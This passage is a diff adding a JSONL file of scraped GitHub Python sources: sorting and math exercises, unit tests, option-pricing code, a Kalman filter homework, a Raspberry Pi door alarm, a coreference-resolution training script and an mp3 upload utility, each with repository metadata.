diff --git "a/300.jsonl" "b/300.jsonl" new file mode 100644--- /dev/null +++ "b/300.jsonl" @@ -0,0 +1,1850 @@ +{"seq_id":"11526586716","text":"# Given an array A[] consisting of only 0s, 1s, and 2s. The task is to write a function that sorts the given array. \n# The functions should put all 0s first, then all 1s and all 2s in last.\n# This problem is also the same as the famous “Dutch National Flag problem”.\n\ndef swap(a, b):\n return b, a\n\ndef sortArray(array, size):\n low, mid = 0, 0\n high = size - 1\n while(mid <= high):\n if(array[mid] == 0):\n array[low], array[mid] = swap(array[low], array[mid])\n low += 1\n mid += 1\n elif(array[mid] == 1):\n mid += 1\n else:\n array[mid], array[high] = swap(array[mid], array[high])\n high = high - 1\n return array\n\ndef printarray(array):\n for i in range(len(array)):\n print(array[i], end= \" \")\n\narr = [0, 1, 1, 0, 1, 2, 1, 2, 0, 0, 0, 1]\nsize = len(arr)\narray = sortArray(arr, size)\nprintarray(sortArray(arr, size))\n ","repo_name":"Sottim/DSAFromScratch","sub_path":"Arrays/sortArrayOf0s1sAnd2s.py","file_name":"sortArrayOf0s1sAnd2s.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12456850634","text":"\"\"\"test suite for set_api_url.py.\"\"\"\n\nimport unittest\nimport sys\nimport os\nsys.path.append(\"..\")\nimport set_api_url\nimport logging\nimport misc_utils.unittest_extend as ute\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass TestSetAPIUrl(unittest.TestCase):\n \"\"\"Test suite for set_api_url.py.\"\"\"\n\n def test_set_api_url(self):\n \"\"\"Returns NOne. Tests replacement of api url on test .js files.\"\"\"\n UI_path = './resources/'\n test_js_filename = 'test_main.js'\n new_js_filename = UI_path + 'main_blabla.js'\n reference_js = UI_path + 'test_main_reference.js'\n\n os.system('cp {} {}'.format(\n UI_path + test_js_filename,\n new_js_filename))\n\n api_url = 'https://app.etabot.ai:8000/api/'\n set_api_url.set_api_url(\n UI_path, api_url, api_url_var_name='apiUrl')\n\n ute.assertFileEqual(new_js_filename, reference_js, self)\n os.remove(new_js_filename)\n\nunittest.main()\n","repo_name":"ShanshanHe/pmp","sub_path":"etabotsite/etabotapp/tests/test_set_api_url.py","file_name":"test_set_api_url.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23908608296","text":"import random\n\nfrom cminer.consts import COIN\nfrom cminer.logger import logger\nfrom cminer.system import System\n\n\nclass MineProgress:\n def __init__(self, level):\n self.level = level\n self.mine = None\n self.dig_deeper(0, is_initial=True)\n\n def dig_by(self, axe, player):\n axe_broken = False\n coin = 0\n items = dict()\n\n damage = axe.damage_on_hardness(self.mine.model.hardness)\n if random.random() < player.crit_prob:\n logger.info('****** CRITICAL **')\n damage *= player.crit_damage\n self.mine.status.hp_now -= damage\n logger.debug(f'用 {axe} 造成了 {damage} 点伤害')\n axe.status.endurance -= 1\n\n if axe.status.endurance <= 0:\n axe_broken = True\n logger.info(f'{axe} 坏了')\n else:\n logger.debug(f'{axe} 耐久 '\n f'{axe.status.endurance}/{axe.model.endurance}')\n if self.mine.status.hp_now <= 0:\n _awards = self.mine.award\n for k, v in _awards.items():\n if k == COIN:\n coin = v\n else:\n items[System.item(k)] = v\n awards_text = [f'{v}个 {k}'\n for k, v in items.items()]\n awards_text += [f'{coin}枚 金幣']\n awards_text = '獲得: ' + ', 
'.join(awards_text)\n logger.info(awards_text)\n self.dig_deeper(player.lucky_prob)\n else:\n logger.debug(f'{self.mine}剩餘血量 '\n f'{self.mine.status.hp_now}/{self.mine.status.hp}')\n return dict(\n axe_broken=axe_broken,\n awards=dict(\n coin=coin,\n items=items,\n ),\n mine_level=self.level\n )\n\n def dig_deeper(self, lucky, is_initial=False):\n if not is_initial:\n self.level += 1\n self.mine = System.mine_at_level(self.level, lucky)\n logger.info(f'到达{self.level}层, 发现 {self.mine}, '\n f'血量: {self.mine.status.hp}')\n return self.level\n\n","repo_name":"monk-studio/cminer-profiler","sub_path":"cminer/core/archive/mine_progress.py","file_name":"mine_progress.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31314108467","text":"import math\nimport numpy as np\nfrom scipy.integrate import quad\n\n\ndef M76_call_value(mar_env):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach.\n Parameters\n ==========\n initial_value : float\n initial stock/index level\n strike : float\n strike price\n maturity : datetime object\n time-to-maturity (for t=0)\n short_rate : float\n constant risk-free short rate\n volatility : float\n volatility factor diffusion term\n lamb : float\n jump intensity\n mu : float\n expected jump size\n delta : float\n standard deviation of jump\n Returns\n =======\n call_value: float\n present value of European call option\n '''\n\n try:\n S0 = mar_env.get_constant('initial_value')\n K = mar_env.get_constant('strike')\n T = (mar_env.get_constant('maturity') -\n mar_env.pricing_date).days / 365.\n r = mar_env.get_curve('discount_curve').short_rate\n lamb = mar_env.get_constant('lambda')\n mu = mar_env.get_constant('mu')\n delta = mar_env.get_constant('delta')\n volatility = mar_env.get_constant('volatility')\n except:\n print('Error parsing market environment.')\n\n int_value = quad(lambda u:\n M76_int_func_sa(\n u, S0, K, T, r, volatility, lamb, mu, delta),\n 0, np.inf, limit=250)[0]\n call_value = max(0, S0 - np.exp(-r * T) * np.sqrt(S0 * K) /\n np.pi * int_value)\n return call_value\n\n\ndef M76_put_value(mar_env):\n ''' Valuation of European put option in M76 model via Lewis (2001)\n Fourier-based approach. 
'''\n\n try:\n S0 = mar_env.get_constant('initial_value')\n K = mar_env.get_constant('strike')\n T = (mar_env.get_constant('maturity') -\n mar_env.pricing_date).days / 365.\n r = mar_env.get_curve('discount_curve').short_rate\n except:\n print('Error parsing market environment.')\n\n call_value = M76_call_value(mar_env)\n put_value = call_value + K * math.exp(-r * T) - S0\n return put_value\n\n\ndef M76_int_func_sa(u, S0, K, T, r, volatility, lamb, mu, delta):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach: integration function.\n Parameter definitions see function M76_call_value.'''\n char_func_value = M76_char_func_sa(u - 0.5 * 1j, T, r, volatility,\n lamb, mu, delta)\n int_func_value = 1 / (u ** 2 + 0.25) \\\n * (np.exp(1j * u * np.log(S0 / K)) * char_func_value).real\n return int_func_value\n\n\ndef M76_char_func_sa(u, T, r, volatility, lamb, mu, delta):\n ''' Valuation of European call option in M76 model via Lewis (2001)\n Fourier-based approach: characteristic function 'jump component'.\n Parameter definitions see function M76_call_value.'''\n omega = r - 0.5 * volatility ** 2 \\\n - lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n char_func_value = np.exp((1j * u * omega -\n 0.5 * u ** 2 * volatility ** 2 +\n lamb * (np.exp(1j * u * mu -\n u ** 2 * delta ** 2 * 0.5) - 1)) * T)\n return char_func_value","repo_name":"mccarvik/python_for_finance","sub_path":"dx/analytical/jump_diffusion.py","file_name":"jump_diffusion.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39966415344","text":"import random\nimport math\n\ndef check_integer(nums):\n for num in nums:\n if num != int(num): \n raise TypeError('Argument must be an integer')\ndef check_nonneg_int(nums):\n try:\n check_integer(nums)\n except:\n raise TypeError('Argument must be a nonnegative integer')\n for num in nums:\n if num < 0:\n raise ValueError('Argument must be a nonnegative integer')\ndef check_pos_int(nums):\n try:\n check_integer(nums)\n except:\n raise TypeError('Argument must be a positive integer')\n for num in nums:\n if num < 1:\n raise ValueError('Argument must be a positive integer')\n\ndef gen_rand_poly(deg_lower_limit = 1, deg_upper_limit = 10, coeff_limit = 10):\n \"\"\"\n Generates a random polynomial with integer coefficients.\n \"\"\"\n deg = random.randint(deg_lower_limit,deg_upper_limit)\n coeffs = [random.randint(-coeff_limit, coeff_limit) for _ in range(deg+1)]\n\n # Never have 0 as leading coefficient\n if coeffs[deg] == 0:\n coeffs[deg] = 1\n\n def term(coeff, d):\n if coeff == 0:\n return ''\n elif d == 0:\n return (' + ' if coeff>0 else ' - ') + str(abs(coeff))\n elif d == 1:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x' if abs(coeff)!=1 else 'x')\n elif d == deg:\n return ('' if coeff>0 else '-') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n else:\n return (' + ' if coeff>0 else ' - ') + (f'{abs(coeff)}x^{d}' if abs(coeff)!=1 else f'x^{d}')\n\n terms = [term(coeffs[d], d) for d in range(deg+1)]\n return deg, coeffs, ''.join([terms[d]for d in range(deg,-1,-1)]).strip('+ ')\n\ndef lcm(a,b):\n check_pos_int([a,b])\n out = a\n while out % b != 0:\n out += a\n return out\n\ndef gcf(a,b):\n check_pos_int([a,b])\n if a != round(a) or b != round(b):\n raise TypeError('Argument must be a positive integer')\n if a < 1 or b < 1:\n raise ValueError('Argument must be a positive integer')\n [x,y] = sorted([a,b])\n while (y % x != 0):\n y 
-= x\n [x,y] = sorted([x,y])\n return x\n\ndef factorial(n):\n check_nonneg_int([n])\n if n == 0: return 1\n return n * factorial(n-1)\n\ndef choose (n, k):\n check_nonneg_int([n,k])\n if n < k: return 0\n if k > n/2: \n k = n-k\n numer, denom = 1, 1\n for i in range(k):\n numer *= n-i\n denom *= i+1\n return int(numer/denom)\n\n","repo_name":"quadraticmuffin/discord-ftw","sub_path":"problem_gen/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18590680094","text":"n, k = map(int, input().split())\nresult = 0\n\n#n이 k보다 크거나 같을 경우에 반복\nwhile n >= k:\n #n이 k로 나누어 떨어지지 않으면 1씩 빼기\n while n % k != 0:\n n -= 1\n result += 1\n n //= k\n result += 1\n\n#n이 1일 때까지\nwhile n > 1:\n n -= 1\n result += 1\n\nprint(result)","repo_name":"kys910/pythonRidi","sub_path":"3_3.py","file_name":"3_3.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6322426642","text":"import numpy as np\n\ndef gamma_pseudoinverse(gmat, n):\n g = np.zeros_like(gmat)\n for i in range(n):\n g[i,i] = 1/ np.sqrt(1 + g[i,i])\n \n return g\n\nif __name__ =='__main__':\n x = 2 ** 0.5 * np.array([[1.0,1.0,0.0],[-1.0,0.0, 1.0],[0.0,-1.0,-1.0]])\n\n H = np.eye(3)\n R = np.eye(3)\n\n xdelta = x - x.mean(axis=0, keepdims=True)\n\n B = 0.5 * xdelta.T @ xdelta\n\n #H is identity\n K = B @ np.linalg.inv(B + R)\n\n #again, H is identity\n C = (H - K) @ B\n\n print(\"Posterior covariance: \", C)\n\n A = xdelta.T / (2 ** 0.5)\n\n V = H @ A\n\n F, sgm, W = np.linalg.svd(A.T @ A)\n sigma = np.diag(sgm)\n sigmaInv = np.linalg.pinv(sigma)\n\n sigmaPseudoId = sigmaInv @ sigma @ sigma @ sigmaInv\n\n #V^T V is Hermitian, and R is identity so V^T R V = V^T V\n Gamma, Q = np.linalg.eigh(V.T @ V)\n\n Gamma[0] = 0.0\n\n #2b\n\n GammaInv = np.diag(1.0/np.sqrt(Gamma + 1))\n\n C = A @ Q @ GammaInv @ sigmaPseudoId @ GammaInv @ Q.T @ A.T\n\n print(\"EAKF C: \", C)\n\n #2c, same as above, just flip the columns in Gamma and Q\n\n A = xdelta.T / (2 ** 0.5)\n\n V = H @ A\n\n F, sgm, W = np.linalg.svd(A.T @ A)\n sigma = np.diag(sgm)\n sigmaInv = np.linalg.pinv(sigma)\n\n sigmaPseudoId = sigmaInv @ sigma @ sigma @ sigmaInv\n Gamma, Q = np.linalg.eigh(V.T @ V)\n\n Qp = np.fliplr(Q)\n\n Gamma[0] = Gamma[2]\n Gamma[2] = 0.0\n\n GammaInv = np.diag(1.0/np.sqrt(Gamma + 1))\n\n print(sigmaPseudoId)\n\n C = A @ Qp @ GammaInv @ sigmaPseudoId @ GammaInv @ Qp.T @ A.T\n\n print(\"EAKF C: \", C)\n \n","repo_name":"DiffeoInvariant/Data-Assimilation","sub_path":"enkf/include/hw7.py","file_name":"hw7.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42726888078","text":"\"\"\"Unit tests for preprocessors.\"\"\"\nfrom bs4 import BeautifulSoup\n\nfrom fonduer.parser.preprocessors.hocr_doc_preprocessor import HOCRDocPreprocessor\n\n\ndef test_hocrpreprocessor():\n \"\"\"Test hOCRDocPreprocessor with a simple hOCR.\"\"\"\n path = \"tests/data/hocr_simple/md.hocr\"\n preprocessor = HOCRDocPreprocessor(path=path)\n doc = next(iter(preprocessor))\n assert doc.name == \"md\"\n # the intermidiate attribute: \"fonduer\" should be removed.\n assert \"fonduer\" not in doc.text\n # number of \"left\" attribute is equal to that of \"ppageno\" - 1 (at ocr_page)\n assert doc.text.count(\"left\") == doc.text.count(\"ppageno\") - 1 == 24\n\n\ndef 
test_hocrpreprocessor_space_false():\n \"\"\"Test hOCRDocPreprocessor with space=False.\"\"\"\n path = \"tests/data/hocr_simple/japan.hocr\"\n preprocessor = HOCRDocPreprocessor(path=path, space=False)\n doc = next(iter(preprocessor))\n assert doc.name == \"japan\"\n # the intermidiate attribute: \"fonduer\" should be removed.\n assert \"fonduer\" not in doc.text\n\n soup = BeautifulSoup(doc.text, \"lxml\")\n element = soup.find(id=\"par_1_1\")\n\n # A token cannot contain \" \" (whitespace) as \"tokens\" are deliminated by a \" \".\n assert len(element.get(\"left\").split()) == len(element.get(\"tokens\").split()) == 59\n","repo_name":"HazyResearch/fonduer","sub_path":"tests/parser/test_preprocessor.py","file_name":"test_preprocessor.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":395,"dataset":"github-code","pt":"53"} +{"seq_id":"36086902834","text":"from grovepi import *\n\n\n\nbuzzer_pin = 2\nultrasonic_range = 8\n\npinMode(buzzer_pin,\"OUTPUT\")\npinMode(ultrasonic_range,\"INPUT\")\n\n\n\nfirst = True\nwhile True:\n\ttry:\n\t\tdistance = ultrasonicRead(ultrasonic_range)\n\t\n\t\tif first:\n\t\t\tinitial_distance = distance\n\t\t\tfirst = False\n\t\t\ttime.sleep(10)\n\t\tif initial_distance - distance > 10:\n\t\t\tdigitalWrite(buzzer_pin,1)\n\t\telse:\n\t\t\tdigitalWrite(buzzer_pin,0)\n\t\t\n\texcept KeyboardInterrupt:\n\t\tdigitalWrite(buzzer_pin,0)\n\t\tprint(\"KeyboardInterrupt\")\n\t\tbreak\n\texcept (TypeError,IOError) as e:\n\t\tprint('Error')\n\n","repo_name":"x17142849/webapp","sub_path":"door_alarm.py","file_name":"door_alarm.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"662513311","text":"from sklearn.utils import shuffle\nfrom ontonotes_utils import *\nfrom loader_ontonotes_pronoun import *\nimport torch.optim as optim\nfrom torch import nn\nfrom pretrain_elmo_model import Model\nimport numpy as np\nfrom early_stopping import *\nimport torch\n\nclass Trainer:\n def __init__(self,\n train_feature,\n model,\n early_stopping_patience,\n learning_rate,\n num_epochs,\n batch_size,\n X_train,\n X_val,\n X_test,\n y_train,\n y_val,\n y_test,\n device: torch.DeviceObjType = 'cuda' if torch.cuda.is_available() else 'cpu'):\n\n self.train_feature = train_feature\n self.early_stopping_patience = early_stopping_patience\n self.X_train = X_train\n self.X_val = X_val\n self.X_test = X_test\n self.y_train = y_train\n self.y_val = y_val\n self.y_test = y_test\n\n self.device = device\n self.num_epochs = num_epochs\n self.batch_size = batch_size\n self.model = model.to(self.device)\n self.lr = learning_rate\n self.criterion = nn.BCELoss().to(self.device) # binary cross entropy\n self.optimizer = optim.AdamW(self.model.parameters(), lr=self.lr)\n self.seed = 20\n\n self.train_loss_path = \"../arrays/{train_feature}_train_loss.txt\".format(train_feature=self.train_feature)\n self.valid_loss_path = \"../arrays/{train_feature}_valid_loss.txt\".format(train_feature=self.train_feature)\n self.eva_path = \"../arrays/pretrain_{train_feature}_eva.txt\".format(train_feature=self.train_feature)\n\n self.train_loss_array = []\n self.valid_loss_array = []\n\n self.success_rate = None\n\n # for evaluation\n self.num_all_correct = 0\n self.num_all_anaphor = 0\n\n # eva_file\n with open('../evaluation/{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'w') as f:\n f.write('')\n\n # results_file\n with 
open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'w') as f:\n f.write('')\n\n # losses file\n with open(self.train_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.train_loss_array))\n\n with open(self.valid_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.valid_loss_array))\n\n # new losses file\n self.avg_train_loss_path = \"../arrays/avg_{train_feature}_train_loss.txt\".format(train_feature=self.train_feature)\n self.avg_valid_loss_path = \"../arrays/avg_{train_feature}_valid_loss.txt\".format(train_feature=self.train_feature)\n self.avg_train_loss_array = []\n self.avg_valid_loss_array = []\n with open(self.avg_train_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.avg_train_loss_array))\n with open(self.avg_valid_loss_path, \"w\") as fp:\n fp.write(json.dumps(self.avg_valid_loss_array))\n\n def train(self):\n sum_train_loss = 0\n sum_val_loss = 0\n\n # INITIALIZE THE EARLY STOPPING OBJECT\n early_stopping = EarlyStopping(self.train_feature, patience=self.early_stopping_patience, pretrain=True, save_model=True)\n\n ### FOR EVER EPOCHE\n for e in range(self.num_epochs): # loop over the dataset multiple times\n epoch_train_sample_pairs_len = 0\n epoch_val_sample_pairs_len = 0\n epoch_train_loss = 0.0\n\n # Shuffle the corpus\n X_train, y_train = shuffle(self.X_train, self.y_train, random_state=self.seed * e)\n X_val, y_val = shuffle(self.X_val, self.y_val, random_state=self.seed * e)\n\n ### TRAINING\n ### EVERY BATCH\n self.model.train()\n for X_batch, y_batch in zip(batch(X_train, self.batch_size), batch(y_train, self.batch_size)):\n self.optimizer.zero_grad() # zero the parameter gradients\n current_batch_size = len(X_batch)\n\n batch_concat_pairs, potential_slices = self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n for sample_results in batch_outputs:\n epoch_train_sample_pairs_len += len(sample_results)\n # if torch.cuda.is_available():\n flat_outputs = torch.cat([p for sample in batch_outputs for p in sample]).to(self.device)\n flat_labels = torch.Tensor([l for sample in y_batch for l in sample]).to(self.device)\n\n loss = self.criterion(flat_outputs, flat_labels)\n # Backward pass\n loss.backward()\n self.optimizer.step()\n epoch_train_loss += loss.item()\n sum_train_loss += loss.item()\n\n with open(self.train_loss_path, 'r') as f:\n try:\n self.train_loss_array = json.load(f)\n try:\n self.train_loss_array.append(loss.item())\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.train_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.train_loss_array))\n\n\n epoch_train_loss_avg = epoch_train_loss / len(X_train)\n with open(self.avg_train_loss_path, 'r') as f:\n try:\n self.avg_train_loss_array = json.load(f)\n try:\n self.avg_train_loss_array.append(epoch_train_loss_avg)\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.avg_train_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.avg_train_loss_array))\n\n ### VALIDATION => validate every epoch to find and save the best model\n epoch_valid_loss = 0.0\n self.model.eval()\n\n with torch.no_grad():\n for X_batch, y_batch in zip(batch(X_val, self.batch_size), batch(y_val, self.batch_size)):\n current_batch_size = len(X_batch)\n # Forward Pass\n batch_concat_pairs, potential_slices = 
self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n for sample_results in batch_outputs:\n epoch_val_sample_pairs_len += len(sample_results)\n flat_outputs = torch.cat([p for sample in batch_outputs for p in sample]).to(self.device)\n flat_labels = torch.Tensor([l for sample in y_batch for l in sample]).to(self.device)\n # Find the Loss\n loss = self.criterion(flat_outputs, flat_labels)\n # Calculate Loss\n epoch_valid_loss += loss.item()\n sum_val_loss += loss.item()\n\n with open(self.valid_loss_path, 'r') as f:\n try:\n self.valid_loss_array = json.load(f)\n try:\n self.valid_loss_array.append(loss.item())\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.valid_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.valid_loss_array))\n\n\n epoch_valid_loss_avg = epoch_valid_loss / len(X_val)\n with open(self.avg_valid_loss_path, 'r') as f:\n try:\n self.avg_valid_loss_array = json.load(f)\n try:\n self.avg_valid_loss_array.append(epoch_valid_loss_avg)\n except AttributeError:\n raise AttributeError\n except json.decoder.JSONDecodeError:\n pass\n # save the whole losses by every batch\n with open(self.avg_valid_loss_path, \"a\") as fp:\n fp.write(json.dumps(self.avg_valid_loss_array))\n\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write(\n 'Epoch {e} \\t\\t Training Loss: {epoch_train_loss} \\t\\t Validation Loss: {epoch_valid_loss}\\n\\n'.format(\n e=e + 1, epoch_train_loss=epoch_train_loss, epoch_valid_loss=epoch_valid_loss))\n\n early_stopping(epoch_valid_loss, self.model, self.optimizer, e)\n\n if early_stopping.early_stop_break_epoch == True:\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write('EARLY BREAK AT EPOCH {e}'.format(e=e + 1))\n break\n\n # EVALUATION\n with torch.no_grad():\n success_rate = self.evaluate(self.X_test, self.y_test, 200)\n success_rate_2 = self.num_all_correct / self.num_all_anaphor\n\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature),\n 'a') as f:\n f.write('\\n\\n Success rate: {success_rate}'.format(success_rate=success_rate))\n f.write('\\n\\n Success rate2: {success_rate}'.format(success_rate=success_rate_2))\n\n\n with open(self.eva_path, \"w\") as fp:\n fp.write(json.dumps(str(success_rate) + '\\n' + 'success rate 2: ' + str(success_rate_2)))\n\n # EVALUATE the model\n def evaluate(self, X_test, y_test, num_evaSamples_to_save):\n '''\n Evaluate the model on the test set\n @return: Success rate = successfully resolved anaphors/number of all anaphors\n '''\n print('Evaluating...')\n ana_num_id = 0\n if ana_num_id < num_evaSamples_to_save:\n eva_file = open(\n '../evaluation/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature), 'a')\n all_ana_len = 0\n self.model.eval()\n correct = 0\n num_anaphors = 0\n\n # FOR EVERY ANAPHOR\n for X_batch, y_batch in zip(batch(X_test, self.batch_size), batch(y_test, self.batch_size)):\n current_batch_size = len(X_batch)\n all_ana_len += current_batch_size\n\n batch_concat_pairs, potential_slices = self.model(X_batch) # SIGMOID RESULTS of one batch\n batch_label_outputs, _ = self.model.predict(batch_concat_pairs, potential_slices)\n\n ana_strs = [ana[\"tokens\"] for ana in X_batch]\n ana_contexts = 
[ana['context'] for ana in X_batch]\n golds_str = [ana[\"golds_str\"] for ana in X_batch]\n all_ps_strs = [[p[\"tokens\"] for p in ana[\"potential_antecedents\"]] for ana in X_batch]\n # EVERY SAMPLE\n i = 0\n for targets, ys in zip(batch_label_outputs, y_batch):\n num_anaphors += 1\n selected_index = targets.index(max(targets))\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('anaphor: ' + str(ana_strs[i]) + '\\n')\n eva_file.write('candidates: ' + str(all_ps_strs[i]) + '\\n')\n eva_file.write('gold: ' + str(golds_str[i]) + '\\n')\n eva_file.write('selected cand: ' + str(all_ps_strs[i][selected_index]) + '\\n')\n eva_file.write('context: ' + str(ana_contexts[i]) + '\\n')\n\n # if one of the candidates is gold\n if 1 in ys: # because its possible that none of the potential candicates is right(e.g. the gold antecedent is not in the 3 sents before)\n gold_and_coref_idxs = [i for i, val in enumerate(ys) if val == 1]\n if selected_index in gold_and_coref_idxs:\n correct += 1\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('right\\n')\n else:\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('wrong\\n')\n else:\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('wrong\\n')\n if ana_num_id < num_evaSamples_to_save:\n eva_file.write('\\n')\n i += 1\n ana_num_id += 1\n self.num_all_correct += correct\n self.num_all_anaphor += num_anaphors\n success_rate = correct / num_anaphors\n\n self.success_rate = success_rate\n with open('../results/pretrain_{train_feature}_evaluation.txt'.format(train_feature=self.train_feature), 'a') as f:\n f.write('Anaphor ammounts: ' + str(num_anaphors))\n f.write('Success rate: ' + str(success_rate))\n if ana_num_id < num_evaSamples_to_save:\n eva_file.close()\n\n return success_rate\n\nif __name__ == '__main__':\n print('Loading datasets...')\n\n train_val_test = load_corpus_list()\n\n reduced_size_train = round(len(train_val_test[0][0])/5)\n reduced_size_test = round(len(train_val_test[1][0])/5)\n reduced_size_val = round(len(train_val_test[2][0])/5)\n\n X_train = train_val_test[0][0][:reduced_size_train]\n X_val = train_val_test[1][0][:reduced_size_test]\n X_test = train_val_test[2][0][:reduced_size_val]\n\n y_train = train_val_test[3][:-1][:reduced_size_train]\n y_val = train_val_test[4][:-1][:reduced_size_test]\n y_test = train_val_test[5][:-1][:reduced_size_val]\n\n early_stopping_patience = 10\n num_epochs = 100 # klowersa = 20\n learning_rate = 1e-6\n batch_size = 8 # the number of training examples utilized in one iteration = length of training samples\n elmo_emb_size = 256\n glove_emb_size = 300\n embedding_size = elmo_emb_size + glove_emb_size\n hidden_size = embedding_size # Klowersa: hidden size of the BiLSTM = word embedding dimensionality\n\n train_feature = '5DATA_4layer_5DATA_2dropout_NoLN_NoFea'\n\n model = Model(batch_size=batch_size,\n num_layers=1,\n distance_feature=False,\n grammar_role_feature=False,\n definiteness_feature=False,\n match_feature=False,\n synonym_feature=False,\n hypernym_feature=False)\n\n trainer = Trainer(train_feature,\n model,\n early_stopping_patience,\n learning_rate,\n num_epochs,\n batch_size,\n X_train,\n X_val,\n X_test,\n y_train,\n y_val,\n y_test)\n\n trainer.train()","repo_name":"jinhuang-de/BA-Resolving-comparative-anaphora-with-and-without-lexical-heads","sub_path":"src/pretrain_hold_out_train.py","file_name":"pretrain_hold_out_train.py","file_ext":"py","file_size_in_byte":15565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"42875908691","text":"from pydub import AudioSegment\nimport requests\nimport platform\nimport os\nimport urllib.parse\n\n# print(platform.system())\n\nawsHost = 'http://mp3loudv4-env.eba-ngusggxk.ap-northeast-2.elasticbeanstalk.com/file/upload/1?'\nlocalHost = 'http://127.0.0.1:8080/file/upload/1?'\n\nrootDir = os.getcwd()\nseparater = \"\"\n\nif (platform.system() == 'Darwin'):\n AudioSegment.converter = '/usr/local/bin/ffmpeg'\n AudioSegment.ffmpeg = '/usr/local/bin/ffmpeg'\n AudioSegment.ffprobe = '/usr/local/bin/ffprobe'\n separater = '/'\nelse:\n AudioSegment.converter = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\n AudioSegment.ffmpeg = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\n AudioSegment.ffprobe = \"C:\\\\Users\\\\user\\\\Desktop\\\\workspace\\\\library\\\\ffmpeg\\\\bin\\\\ffprobe.exe\"\n separater = '\\\\'\n\nrootDir += separater + 'res'\n\n\ndef upload_mp3(genre, title, artist):\n relativePath = \"res\" + separater + genre + separater\n params = {'genre': genre, 'title':title, 'artist':artist}\n url = awsHost + urllib.parse.urlencode(params)\n files = {\n 'mp3': open(relativePath + artist + ' - ' + title + '.mp3', 'rb'),\n 'image': open(relativePath + title + '.jpg', 'rb')\n }\n r = requests.post(url, files=files)\n print(r.text)\n\n\nfor subdir, dirs, files in os.walk(rootDir):\n for dir in dirs:\n genre = dir\n for subdir2, dirs2, files2 in os.walk(rootDir + separater + dir):\n for file in files2:\n if \".mp3\" in file:\n print(file)\n artist = file.split(\" - \")[0]\n title = file.split(\" - \")[1].split(\".\")[0]\n upload_mp3(genre, title, artist)\n\n\n# current_home = path.expanduser('~')\n# #search_dir = path.join(current_home + \"/Music/iTunes/iTunes Media/Music/Rush/Chronicles (Disc 2)/2-03 Limelight.mp3\") # noqa\n#\n# def track_info(filename):\n# \"\"\"Module Built To Read ID3 Track Data.\"\"\"\n# tag = id3.Tag()\n# tag.parse(filename)\n# a = load(filename)\n# print(\"# {}\".format('=' * 78))\n# print(\"Track Name: {}\".format(tag.title))\n# print(\"Track Artist: {}\".format(tag.artist))\n# print(\"Track Album: {}\".format(tag.album))\n# print(\"Track Duration: {}\".format(duration_from_seconds(a.info.time_secs)))\n# print(\"Track Number: {}\".format(tag.track_num))\n# print(\"Track BitRate: {}\".format(a.info.bit_rate))\n# print(\"Track BitRate: {}\".format(a.info.bit_rate_str))\n# print(\"Sample Rate: {}\".format(a.info.sample_freq))\n# print(\"Mode: {}\".format(a.info.mode))\n# print(\"# {}\".format('=' * 78))\n# print(\"Album Artist: {}\".format(tag.album_artist))\n# print(\"Album Year: {}\".format(tag.getBestDate()))\n# print(\"Album Recording Date: 